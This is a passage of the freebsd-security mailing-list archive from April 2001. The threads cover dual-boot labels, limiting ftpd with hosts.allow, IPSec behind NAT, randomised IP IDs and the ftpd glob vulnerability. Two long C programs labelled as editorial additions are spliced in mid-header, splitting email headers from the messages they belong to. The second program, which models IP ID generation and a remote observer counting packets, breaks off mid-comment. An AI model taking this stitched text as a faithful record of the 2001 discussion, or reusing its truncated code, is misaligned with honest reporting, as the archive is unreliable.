X-Accept-Language: en,fr-CA,fr
Subject: Re: FreeBSD Login

This is indeed not the place to ask. The questions mailing list is the place for general questions.

But even then, you should have checked the existing documentation.

A 30-second search on the FreeBSD main website (http://www.FreeBSD.org/cgi/search.cgi?words=dual+boot&max=50&source=www) led me to http://www.freebsd.org/handbook/boot.html at first, and more importantly: http://www.freebsd.org/tutorials/multi-os/ch5.html, at last.

I recommend the OS-BS boot manager to you.

A.

Nick Mazza wrote:
>
> This doesn't pertain to security so I will probably be flamed for this
> email, but I am in urgent need of an answer to a simple FreeBSD boot
> question. I am dual booting a Windows 2000 machine and FreeBSD 4.3RC2 and
> using the FBSD boot loader. The boot loader appears like this:
>
> F1: ??
> F3: FreeBSD
> F5: Drive 1
>
> Default: F3 /* Or the OS that I booted last */
>
> I want to be able to change the ?? to say Windows 2000 and have the default
> OS boot Windows 2000 even if my last boot was FBSD (personally I don't mind
> things, but guests who use this computer always get confused and press F5 or
> something). If anyone can help or point me in the direction of a HOW-TO I
> would greatly appreciate it.
>
> Nick MAzza
> _________________________________________________________________
> Get your FREE download of MSN Explorer at http://explorer.msn.com

--
La sémantique est la gravité de l'abstraction.

From owner-freebsd-security Mon Apr 16 10:55:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from veldy.net (w028.z064001117.msp-mn.dsl.cnc.net [64.1.117.28]) by hub.freebsd.org (Postfix) with ESMTP id 664C037B424 for ; Mon, 16 Apr 2001 10:55:21 -0700 (PDT) (envelope-from veldy@veldy.net) Received: from HP2500B (fuggle.veldy.net [64.1.117.28]) by veldy.net (Postfix) with SMTP id 29F77BA4E; Mon, 16 Apr 2001 12:54:15 -0500 (CDT) Message-ID: <032c01c0c69e$5e81c830$3028680a@tgt.com> From: "Thomas T. Veldhouse" To: , "Nick Mazza" Cc: References: <3ADB2F50.A66BFFD8@lmc.ericsson.se> Subject: Re: FreeBSD Login Date: Mon, 16 Apr 2001 12:55:05 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Actually, I believe he just wants to change the label. FWIW -- it used to identify Windows 2000 as Windows NT in FreeBSD 4.2-RELEASE. They changed it and now it shows ???. It will still boot just fine.

Tom Veldhouse
veldy@veldy.net

----- Original Message -----
From: "Antoine Beaupre (LMC)" To: "Nick Mazza" Cc: Sent: Monday, April 16, 2001 12:43 PM Subject: Re: FreeBSD Login

> This is indeed not the place to ask. The questions mailing list is the
> place for general questions.
>
> But even then, you should have checked the existing documentation.
>
> A 30-second search on the FreeBSD main website
> (http://www.FreeBSD.org/cgi/search.cgi?words=dual+boot&max=50&source=www)
> led me to http://www.freebsd.org/handbook/boot.html at first and, more
> importantly, to http://www.freebsd.org/tutorials/multi-os/ch5.html at
> last.
>
> I recommend the OS-BS boot manager.
>
> A.
>
> Nick Mazza wrote:
> >
> > This doesn't pertain to security so I will probably be flamed for this
> > email, but I am in urgent need of an answer to a simple FreeBSD boot
> > question. I am dual booting a Windows 2000 machine and FreeBSD 4.3RC2 and
> > using the FBSD boot loader. The boot loader appears like this:
> >
> > F1: ??
> > F3: FreeBSD
> > F5: Drive 1
> >
> > Default: F3 /* Or the OS that I booted last */
> >
> > I want to be able to change the ?? to say Windows 2000 and have the default
> > OS boot Windows 2000 even if my last boot was FBSD (Personally I don't mind
> > things but guests who use this computer always get confused and press F5 or
> > something). If anyone can help or point me in the direction of a HOW-TO I
> > would greatly appreciate it.
> >
> > Nick MAzza
> > _________________________________________________________________
> > Get your FREE download of MSN Explorer at http://explorer.msn.com
>
> --
> La sémantique est la gravité de l'abstraction.
From owner-freebsd-security Mon Apr 16 10:59:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from embelia.wanadoo.fr (smtp-rt-7.wanadoo.fr [193.252.19.161]) by hub.freebsd.org (Postfix) with ESMTP id CB77D37B42C for ; Mon, 16 Apr 2001 10:59:46 -0700 (PDT) (envelope-from khaddad@wanadoo.fr) Received: from mahonia.wanadoo.fr (193.252.19.58) by embelia.wanadoo.fr; 16 Apr 2001 19:59:44 +0200 Received: from KHALIL (193.251.55.96) by mahonia.wanadoo.fr; 16 Apr 2001 19:59:20 +0200 Message-ID: <001c01c0c69e$d44889f0$0200a8c0@khalil> From: "Khalil Haddad" To: "Fernando Schapachnik" Cc: References: <200104161651.NAA26855@ns1.via-net-works.net.ar> Subject: Re: FTP - block outer connections Date: Mon, 16 Apr 2001 19:58:23 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Thanks for your answer. I changed my hosts.allow and made a rule to deny all and to allow only the IP of the machine I want to FTP in from, but how do you make the changes take effect? I did not find this in the man pages (other than reboot). Thanks!

----- Original Message -----
From: "Fernando Schapachnik" To: "Khalil Haddad" Cc: Sent: Monday, April 16, 2001 6:51 PM Subject: Re: FTP - block outer connections

> Look at man 5 hosts_access, this should help.
>
> Regards.
>
> In an earlier message, Khalil Haddad wrote:
> > Hello all,
> > I've got an FBSD box running FTPD.
> > I would like it to listen only on ONE of my NIC cards, i.e. the one that is not
> > connected to the net. Can anyone help me secure it?
> >
> > Thanks
>
> Fernando P. Schapachnik
> Network planning and technology
> VIA NET.WORKS ARGENTINA S.A.
> fschapachnik@vianetworks.com.ar
> Tel.: (54-11) 4323-3381

From owner-freebsd-security Mon Apr 16 11: 2:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 0FD0137B423 for ; Mon, 16 Apr 2001 11:02:26 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id LAA30759; Mon, 16 Apr 2001 11:01:53 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda30757; Mon Apr 16 11:01:35 2001 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.2/8.9.1) id f3GI1Tu05323; Mon, 16 Apr 2001 11:01:29 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdCO5316; Mon Apr 16 11:01:18 2001 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.3/8.9.1) id f3GI1Ij05957; Mon, 16 Apr 2001 11:01:18 -0700 (PDT) Message-Id: <200104161801.f3GI1Ij05957@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdOE5953; Mon Apr 16
11:00:58 2001 X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-Sender: schubert To: "David Erickson" Cc: freebsd-security@FreeBSD.ORG Subject: Re: IPSEC/VPN/NAT and filtering In-reply-to: Your message of "Sat, 14 Apr 2001 07:58:43 EDT." <001a01c0c4da$40f0a040$1902a8c0@mddsg.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 16 Apr 2001 11:00:58 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

In message <001a01c0c4da$40f0a040$1902a8c0@mddsg.com>, "David Erickson" writes:
> I do not know about your particular situation however. I am doing NAT'd
> IPSec all the time to work with a Checkpoint Firewall. You just have to
> configure the firewall to accept NAT'd connections in v4.1 sp1 and in sp3
> the support is even better.
>
> Dave

Wouldn't that depend on whether you're using tunnel vs. transport mode IPSec?

Regards,                        Phone:  (250)387-8437
Cy Schubert                     Fax:    (250)387-5766
Team Leader, Sun/Alpha Team     Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC

> ----- Original Message -----
> From: "Mike Harding"
> To:
> Sent: Wednesday, March 21, 2001 12:36 PM
> Subject: IPSEC/VPN/NAT and filtering
>
> >
> > It's possible to use IPSEC on a box with NAT, but you don't want to
> > NAT the ipsec tunnel. What worked for me was to create an ESP tunnel
> > and then route traffic to the remote net to lo0. It then gets
> > encapsulated and sent out the external interface. NAT is not invoked
> > because the traffic no longer looks like your internal network.
> >
> > IPSEC does _not_ play happy with packet filters on the same
> > box... here's an extract from a recent e-mail to kris...
> >
> > I would like to see all of this fixed and working, I'll write a
> > handbook entry and do coding as well....
> >
> > - Mike Harding
> >
> > (extracted from a letter to kris...)
> >
> > I have seen your name on a few exchanges and you seem to be a likely
> > person to discuss this with. The issue is using IPSEC and ipfilter
> > (or ipfw) together on the same box. I think I have a relatively
> > simple way to deal with getting this to work properly.
> >
> > The current problem is that if you use ESP tunnel mode, or transport
> > mode for that matter, the KAME code rewrites the packet contents, and
> > then requeues the packet for further routing. See line 398 in
> > esp_input.c for -STABLE. It does NOT change the interface, so you
> > can't tell this packet from one that comes in via the hardware device.
> > Apparently there is a bit flipped indicating that this is an ipsec'd
> > packet, but the current packet filters don't appear to take advantage
> > of it.
> >
> > My modest proposal would be to have a sysctl variable to indicate an
> > alternate interface to reinject the decrypted packets (like a local
> > loopback, the default or maybe a new one, lo1). Then you know that
> > anything coming in that interface was inserted by the KAME stack and
> > you can apply filtering to it. This would allow firewall and IPSEC
> > gateway functionality to be put into the same box.
> >
> > You can use the 'gif' device for tunnelling, but we are trying to
> > interoperate with a cisco box (politics). There is also pipsecd,
> > which would work, but there is no IKE daemon for it.
> >
> > I think we will work around this by putting another packet filter in
> > front of the IPSEC box, but this would be very useful in general I
> > think...
> >
> > How does this proposal sound? I know the OpenBSD folk put some effort
> > into getting ipfilter and IPSEC to 'play nice'... it would be a shame
> > to have to use 2 boxes or switch OSes to support this.
> >
> > I am willing to write a section in the handbook on this once I have it
> > set up correctly, a box with NAT, VPN, and ipfilter (and alternately
> > IPFW).

From owner-freebsd-security Mon Apr 16 11: 4:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from male.aldigital.co.uk (male.aldigital.co.uk [194.128.162.11]) by hub.freebsd.org (Postfix) with ESMTP id 7614237B424 for ; Mon, 16 Apr 2001 11:04:23 -0700 (PDT) (envelope-from adam@algroup.co.uk) Received: from algroup.co.uk (socks.aldigital.co.uk [194.128.162.10]) by male.aldigital.co.uk (Postfix) with ESMTP id DC6196A1411; Mon, 16 Apr 2001 18:01:03 +0000 (GMT) Message-ID: <3ADB4050.855FE1F6@algroup.co.uk> Date: Mon, 16 Apr 2001 19:56:16 +0100
From: Adam Laurie Organization: A.L. Group plc X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.2-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Khalil Haddad Cc: security@FreeBSD.ORG Subject: Re: FTP - block outer connections References: <002701c0c694$6774ef30$0200a8c0@khalil> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Khalil Haddad wrote:
>
> Hello all,
> I've got an FBSD box running FTPD.
> I would like it to listen only on ONE of my NIC cards, i.e. the one that is not
> connected to the net. Can anyone help me secure it?

Remove ftp from /etc/inetd.conf and run it as a daemon instead:

ftpd -D -a

cheers,
Adam
--
Adam Laurie                   Tel: +44 (20) 8742 0755
A.L. Digital Ltd.             Fax: +44 (20) 8742 5995
Voysey House                  http://www.thebunker.net
Barley Mow Passage            http://www.aldigital.co.uk
London W4 4GB                 mailto:adam@algroup.co.uk
UNITED KINGDOM                PGP key on keyservers

From owner-freebsd-security Mon Apr 16 11:31:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from caligula.anu.edu.au (caligula.anu.edu.au [150.203.224.42]) by hub.freebsd.org (Postfix) with ESMTP id C887237B43F; Mon, 16 Apr 2001 11:31:14 -0700 (PDT) (envelope-from avalon@caligula.anu.edu.au) Received: (from avalon@localhost) by caligula.anu.edu.au (8.9.3/8.9.3) id EAA01848; Tue, 17 Apr 2001 04:30:40 +1000 (EST)
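Khalil's "deny all, then allow one address" rule set and his question about when it takes effect both come down to how hosts_access(5) reads the table: the first matching rule decides, access is granted when no rule matches, and libwrap opens and parses /etc/hosts.allow on every connection, so an edit applies to the next connection with no restart, provided the connection actually passes through a wrapped path such as inetd -w (a daemon started directly, as Adam suggests, is only covered if it is itself linked with libwrap). The C program below is an added example by the editor, not libwrap and not code posted in this thread: a deliberately simplified evaluator for the FreeBSD single-file hosts.allow format (daemon list : client list : allow|deny) that understands ALL, exact addresses, trailing-dot prefixes and n.n.n.n/m.m.m.m pairs, and nothing else (no hostnames, EXCEPT, PARANOID or CIDR). The two tables are constructed; the first puts the specific allow before the catch-all deny, the second swaps the ftpd pair so the deny shadows the allow, which is the ordering mistake worth checking for before trusting the rule set.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* libwrap grants access when no rule matches; HA_NORULE exposes that case. */
enum ha_verdict { HA_DENY = 0, HA_ALLOW = 1, HA_NORULE = 2 };

/* Dotted quad to host-order 32-bit value; 0 on malformed input. */
static int parse_ip4(const char *s, uint32_t *out)
{
    unsigned a, b, c, d; char tail;
    if (sscanf(s, "%u.%u.%u.%u%c", &a, &b, &c, &d, &tail) != 4) return 0;
    if (a > 255 || b > 255 || c > 255 || d > 255) return 0;
    *out = (a << 24) | (b << 16) | (c << 8) | d;
    return 1;
}

static char *trim(char *s)
{
    char *e;
    while (*s == ' ' || *s == '\t') s++;
    e = s + strlen(s);
    while (e > s && (e[-1] == ' ' || e[-1] == '\t' || e[-1] == '\r')) *--e = '\0';
    return s;
}

/* One client pattern against a dotted-quad client: ALL, exact, "10.0.0." prefix, net/mask. */
static int match_client(const char *pat, const char *client)
{
    uint32_t ip, net, mask;
    const char *slash = strchr(pat, '/');
    size_t plen = strlen(pat);

    if (strcmp(pat, "ALL") == 0) return 1;
    if (!parse_ip4(client, &ip)) return 0;
    if (slash != NULL) {                                   /* n.n.n.n/m.m.m.m */
        char netbuf[16];
        size_t n = (size_t)(slash - pat);
        if (n >= sizeof netbuf) return 0;
        memcpy(netbuf, pat, n); netbuf[n] = '\0';
        if (!parse_ip4(netbuf, &net) || !parse_ip4(slash + 1, &mask)) return 0;
        return (ip & mask) == (net & mask);
    }
    if (plen > 0 && pat[plen - 1] == '.') return strncmp(pat, client, plen) == 0;
    return strcmp(pat, client) == 0;
}

static int match_daemon(const char *pat, const char *daemon)
{
    return strcmp(pat, "ALL") == 0 || strcmp(pat, daemon) == 0;
}

/* Comma/blank separated list: does any token match? */
static int match_list(const char *list, const char *subject,
                      int (*fn)(const char *, const char *))
{
    char buf[256], *tok;
    strncpy(buf, list, sizeof buf - 1); buf[sizeof buf - 1] = '\0';
    for (tok = strtok(buf, " ,\t"); tok != NULL; tok = strtok(NULL, " ,\t"))
        if (fn(tok, subject)) return 1;
    return 0;
}

/* Evaluate a hosts.allow table: first matching rule wins; a matching rule
 * without an allow/deny option grants, as it does in hosts.allow. */
enum ha_verdict ha_evaluate(const char *table, const char *daemon, const char *client)
{
    char line[512], *p, *f2, *f3;
    while (*table != '\0') {
        size_t n = strcspn(table, "\n");
        if (n >= sizeof line) n = sizeof line - 1;
        memcpy(line, table, n); line[n] = '\0';
        table += n + (table[n] == '\n');
        p = trim(line);
        if (*p == '\0' || *p == '#') continue;             /* blank or comment */
        if ((f2 = strchr(p, ':')) == NULL) continue;       /* needs daemon:client */
        *f2++ = '\0';
        if ((f3 = strchr(f2, ':')) != NULL) *f3++ = '\0';
        if (!match_list(trim(p), daemon, match_daemon)) continue;
        if (!match_list(trim(f2), client, match_client)) continue;
        if (f3 != NULL && strncmp(trim(f3), "deny", 4) == 0) return HA_DENY;
        return HA_ALLOW;
    }
    return HA_NORULE;
}

/* Constructed tables, not from any real host.  TABLE_OK is the layout Khalil
 * described (specific allow before the catch-all deny); TABLE_SHADOWED swaps
 * the ftpd pair so the deny is reached first and the allow never fires. */
const char *TABLE_OK =
    "# deny everyone except one host for ftpd, one subnet for sshd\n"
    "ftpd : 10.0.0.5 : allow\n"
    "ftpd : ALL : deny\n"
    "sshd : 10.0.0. : allow\n"
    "sshd : ALL : deny\n"
    "ALL : 192.0.2.0/255.255.255.0 : allow\n";
const char *TABLE_SHADOWED =
    "ftpd : ALL : deny\n"
    "ftpd : 10.0.0.5 : allow\n";

int main(void)
{
    printf("ftpd from 10.0.0.5, ok table       -> %d (1 = allow)\n", ha_evaluate(TABLE_OK, "ftpd", "10.0.0.5"));
    printf("ftpd from 10.0.0.6, ok table       -> %d (0 = deny)\n", ha_evaluate(TABLE_OK, "ftpd", "10.0.0.6"));
    printf("telnetd from 198.51.100.9          -> %d (2 = no rule, libwrap allows)\n", ha_evaluate(TABLE_OK, "telnetd", "198.51.100.9"));
    printf("ftpd from 10.0.0.5, shadowed table -> %d (0 = deny: order matters)\n", ha_evaluate(TABLE_SHADOWED, "ftpd", "10.0.0.5"));
    return 0;
}
```

Run it against a copy of your own table to see which rule each client would hit; the HA_NORULE case is the one most often forgotten, since libwrap treats it as permission.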
From: Darren Reed Message-Id: <200104161830.EAA01848@caligula.anu.edu.au> Subject: Re: non-random IP IDs To: wes@softweyr.com (Wes Peters) Date: Tue, 17 Apr 2001 04:30:40 +1000 (Australia/ACT) Cc: kris@obsecurity.org (Kris Kennaway), freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG In-Reply-To: <3ADB0389.5D236D88@softweyr.com> from "Wes Peters" at Apr 16, 2001 08:36:57 AM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

In some mail from Wes Peters, sie said:
>
> Kris Kennaway wrote:
> >
> > On Thu, Apr 12, 2001 at 12:40:32AM -0500, Mike Silbersack wrote:
> >
> > > Each IP packet sent has with it a 16-bit ID. The numbers must remain
> > > unique over a short period of time so fragmentation can work properly. As
> > > such, everything except recent OpenBSDs simply increments the id by 1 for
> > > each packet sent out.
> > >
> > > As a result, you can tell the number of packets sent on an idle host by
> > > seeing the difference in id numbers for the packets it sends back to you.
> > > It's not really that important of an issue, don't worry about it.
> >
> > Here's a patch ported from OpenBSD which randomizes this (supposedly
> > such that it respects the constraint of not wrapping within the
> > prescribed time period). I should wrap it in a sysctl, I guess.
> >
> > http://www.freebsd.org/~kris/ipid.patch
> >
> > Comments?
>
> Looks clean. The only comment I can find is: Why not have ip_randomid()
> return the ID in network byte order? It would save several HTONS macros
> trailing the ip_randomid() calls.

Why do it at all? Why do you want to convert an opaque number from one
byte format to the other? The only reason ip_id should be being converted
*FROM* network byte order to host byte order is for display purposes.

If you disagree with me, think for a moment about what it *really* is.
After all, two random bytes are two random bytes, regardless of which is first.

Darren

From owner-freebsd-security Mon Apr 16 11:36:54 2001 Delivered-To: freebsd-security@freebsd.org Received: from caligula.anu.edu.au (caligula.anu.edu.au [150.203.224.42]) by hub.freebsd.org (Postfix) with ESMTP id DD97837B43C; Mon, 16 Apr 2001 11:36:37 -0700 (PDT) (envelope-from avalon@caligula.anu.edu.au) Received: (from avalon@localhost) by caligula.anu.edu.au (8.9.3/8.9.3) id EAA03291; Tue, 17 Apr 2001 04:36:16 +1000 (EST)
From: Darren Reed Message-Id: <200104161836.EAA03291@caligula.anu.edu.au> Subject: Re: non-random IP IDs To: kris@obsecurity.org (Kris Kennaway) Date: Tue, 17 Apr 2001 04:36:15 +1000 (Australia/ACT) Cc: kris@obsecurity.org (Kris Kennaway), silby@silby.com (Mike Silbersack), newsletter@marktroberts.com (Mark T Roberts), freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG In-Reply-To: <20010416024805.A688@xor.obsecurity.org> from "Kris Kennaway" at Apr 16, 2001 02:48:05 AM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Kris Kennaway, sie said: > > > --rwEMma7ioTxnRzrJ > Content-Type: text/plain; charset=us-ascii > Content-Disposition: inline > Content-Transfer-Encoding: quoted-printable > > On Mon, Apr 16, 2001 at 02:03:11AM -0700, Kris Kennaway wrote: > > > Here's a patch ported from OpenBSD which randomizes this (supposedly > > such that it respects the constraint of not wrapping within the > > prescribed time period). I should wrap it in a sysctl, I guess. > >=20 > > http://www.freebsd.org/~kris/ipid.patch > > Okay, I did this and updated the patch, with the sysctl defaulting to > off since the random algorithm does add some amount of overhead. > > > Comments? You should optimize it for mod being 2^n-1 (or make that a requirement). Also, drop the HTONS statements, they no longer make sense. Before ip_id was a counter and so it made sense (sorta) to change its byte ordering to network. Now it's just a random number so there is no longer any need. 
Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 11:47:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 0BBAA37B43C for ; Mon, 16 Apr 2001 11:47:47 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id LAA30884; Mon, 16 Apr 2001 11:47:14 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda30882; Mon Apr 16 11:47:03 2001 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.2/8.9.1) id f3GIkwY05897; Mon, 16 Apr 2001 11:46:58 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdSO5891; Mon Apr 16 11:46:21 2001 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.3/8.9.1) id f3GIkL206263; Mon, 16 Apr 2001 11:46:21 -0700 (PDT) Message-Id: <200104161846.f3GIkL206263@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdmK6257; Mon Apr 16 11:45:29 2001 X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group 
From: Cy Schubert - ITSD Open Systems Group X-Sender: schubert To: Igor Roshchin Cc: security@FreeBSD.ORG Subject: Re: Wu-ftpd and Remote BSD ftpd glob exploit In-reply-to: Your message of "Mon, 16 Apr 2001 11:16:06 EDT." <200104161516.LAA70850@giganda.komkon.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 16 Apr 2001 11:45:29 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <200104161516.LAA70850@giganda.komkon.org>, Igor Roshchin writes: > > > > Can anybody, please, tell explicitly, or point me to a posting/URL with an > answer to the question: > "Is Wu-ftpd server [and derived from it] also vulnerable ? " > > So far I saw neither positive nor negative identification, but > maybe I missed one. Any application, local or remote, that uses the FreeBSD glob(3) function would have been vulnerable prior to the correction date. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/Alpha Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 12: 6:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-27.dsl.lsan03.pacbell.net [63.207.60.27]) by hub.freebsd.org (Postfix) with ESMTP id 9984A37B43F; Mon, 16 Apr 2001 12:06:30 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 3B228678B7; Mon, 16 Apr 2001 12:06:30 -0700 (PDT) Date: Mon, 16 Apr 2001 12:06:30 -0700 
From: Kris Kennaway To: Darren Reed Cc: Kris Kennaway , Mike Silbersack , Mark T Roberts , freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG Subject: Re: non-random IP IDs Message-ID: <20010416120630.C10023@xor.obsecurity.org> References: <20010416024805.A688@xor.obsecurity.org> <200104161836.EAA03291@caligula.anu.edu.au> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="TYecfFk8j8mZq+dy" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200104161836.EAA03291@caligula.anu.edu.au>; from avalon@coombs.anu.edu.au on Tue, Apr 17, 2001 at 04:36:15AM +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --TYecfFk8j8mZq+dy Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Tue, Apr 17, 2001 at 04:36:15AM +1000, Darren Reed wrote: > You should optimize it for mod being 2^n-1 (or make that a requirement). I'm afraid I don't have time to look at this right now. Perhaps it can be revisited (the sysctl defaults to off for now), or Niels Provos may be interested in the idea. > Also, drop the HTONS statements, they no longer make sense. Before ip_id > was a counter and so it made sense (sorta) to change its byte ordering to > network. Now it's just a random number so there is no longer any need. Well, it still has wrapping properties like a network-order counter, i.e. the algorithm attempts to order the output so that it doesn't wrap within the segment lifetime. That would be lost without using HTONS. 
Kris --TYecfFk8j8mZq+dy Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE620K1Wry0BWjoQKURAn72AJ9LgQ5HdeYEA09g3tA15l62W75dYwCg9pZd g3J2gozaTEXPWVstnZjh9ts= =LYF5 -----END PGP SIGNATURE----- --TYecfFk8j8mZq+dy-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 12:10:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-27.dsl.lsan03.pacbell.net [63.207.60.27]) by hub.freebsd.org (Postfix) with ESMTP id BB9E737B42C; Mon, 16 Apr 2001 12:10:20 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id C7B1B66D8B; Mon, 16 Apr 2001 12:10:19 -0700 (PDT) Date: Mon, 16 Apr 2001 12:10:19 -0700 
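The three points made in this thread so far can be seen in a few dozen lines: Mike Silbersack's, that a sequential ID tells a remote observer how many packets an idle host sent between two probes; Kris's, that whatever replaces the counter must still not reuse an ID within the window fragments can live; and Darren's, that swapping the two bytes of a random value changes nothing about it. The C program below is an added illustration by the editor, not code from the thread, from Kris's patch or from OpenBSD's ip_id.c. It models the old counter beside a randomised generator and lets an observer compare the two. The randomised generator is a full-period linear congruential generator modulo 2^16 (multiplier a = 1 mod 4, odd increment c, both derived from a secret seed), chosen only because its no-reuse property is easy to verify; it is trivially predictable and is not the construction OpenBSD uses. The seed value and probe counts are made up. ipid_distinct(seed, 1) byte-swaps every output before checking uniqueness, which is Darren's point in code.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The pre-patch behaviour: one global counter, stepped once per packet sent. */
static uint16_t seq_id;
uint16_t ip_seqid(void) { return seq_id++; }

/*
 * Stand-in randomised generator (NOT OpenBSD's ip_id.c): a full-period linear
 * congruential generator modulo 2^16.  With c odd and a = 1 (mod 4) it visits
 * every 16-bit value exactly once per 65536 outputs (Hull-Dobell), so an ID is
 * never reused inside that window, which is the "no wrap" property discussed
 * above.  A power-of-two LCG is easy to predict; it is used here only because
 * the permutation property is easy to verify.
 */
struct ipid_state { uint16_t x, a, c; };

static uint32_t mix32(uint32_t *s)            /* xorshift32: expands the seed */
{
    uint32_t v = *s;
    v ^= v << 13; v ^= v >> 17; v ^= v << 5;
    return *s = v;
}

void ipid_init(struct ipid_state *st, uint32_t seed)
{
    uint32_t s = seed ? seed : 0x9e3779b9u;           /* xorshift needs a nonzero state */
    st->a = (uint16_t)((mix32(&s) & 0xfffcu) | 1u);   /* a = 1 mod 4 */
    st->c = (uint16_t)(mix32(&s) | 1u);               /* c odd */
    st->x = (uint16_t)mix32(&s);                      /* secret starting point */
}

uint16_t ip_randomid(struct ipid_state *st)
{
    st->x = (uint16_t)((uint32_t)st->a * st->x + st->c);  /* mod 2^16 by truncation */
    return st->x;
}

/*
 * Distinct values among 65536 consecutive outputs; 65536 means no reuse.
 * swap != 0 byte-swaps each ID first: a bijection, so uniqueness is unchanged.
 */
int ipid_distinct(uint32_t seed, int swap)
{
    struct ipid_state st;
    unsigned char seen[65536 / 8];
    int distinct = 0, i;

    ipid_init(&st, seed);
    memset(seen, 0, sizeof seen);
    for (i = 0; i < 65536; i++) {
        uint16_t id = ip_randomid(&st);
        if (swap) id = (uint16_t)((id << 8) | (id >> 8));
        if (!(seen[id >> 3] & (1u << (id & 7)))) {
            seen[id >> 3] |= (unsigned char)(1u << (id & 7));
            distinct++;
        }
    }
    return distinct;
}

/*
 * The remote observer: probe once (reply carries ID a), the idle host sends
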